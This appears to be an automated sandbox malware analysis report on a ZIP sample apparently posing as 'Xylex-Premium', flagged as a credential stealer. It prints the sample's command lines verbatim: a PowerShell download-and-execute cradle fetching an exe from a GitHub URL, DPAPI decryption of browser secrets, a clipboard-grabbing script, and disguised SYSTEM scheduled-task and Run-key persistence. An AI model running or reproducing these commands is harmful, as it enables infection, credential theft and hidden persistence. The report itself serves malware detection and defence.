Malware Analysis Report

2024-11-30 07:44

Sample ID 240603-g6em7sef2y
Target Xylex-Premium (1).zip
SHA256 bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f
Tags
execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f

Threat Level: Known bad

The file Xylex-Premium (1).zip was found to be: Known bad.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Detects videocard installed

Uses Task Scheduler COM API

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 06:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 06:24

Reported

2024-06-03 06:27

Platform

win11-20240419-en

Max time kernel

89s

Max time network

94s

Command Line

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Xylex-Premium (1).zip"

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Xylex-Premium (1).zip"

Network

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 06:24

Reported

2024-06-03 06:26

Platform

win11-20240508-en

Max time kernel

48s

Max time network

67s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cXJSBWljVeMYxpz.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1584 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 896 wrote to memory of 4916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 896 wrote to memory of 4916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 4916 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1008 wrote to memory of 748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 748 wrote to memory of 1192 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 748 wrote to memory of 1192 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4916 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2312 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2312 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4916 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 3752 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3752 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4916 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4644 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4644 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2372 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3776 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2052 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2052 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4916 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2040 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2828 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2828 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3536 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4916 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1916 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4916 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 3444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 2020 wrote to memory of 3444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4916 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4916 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 3180 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3180 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CDE.tmp" "c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\CSCF175916096AE4A709A7D4E890657D51.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

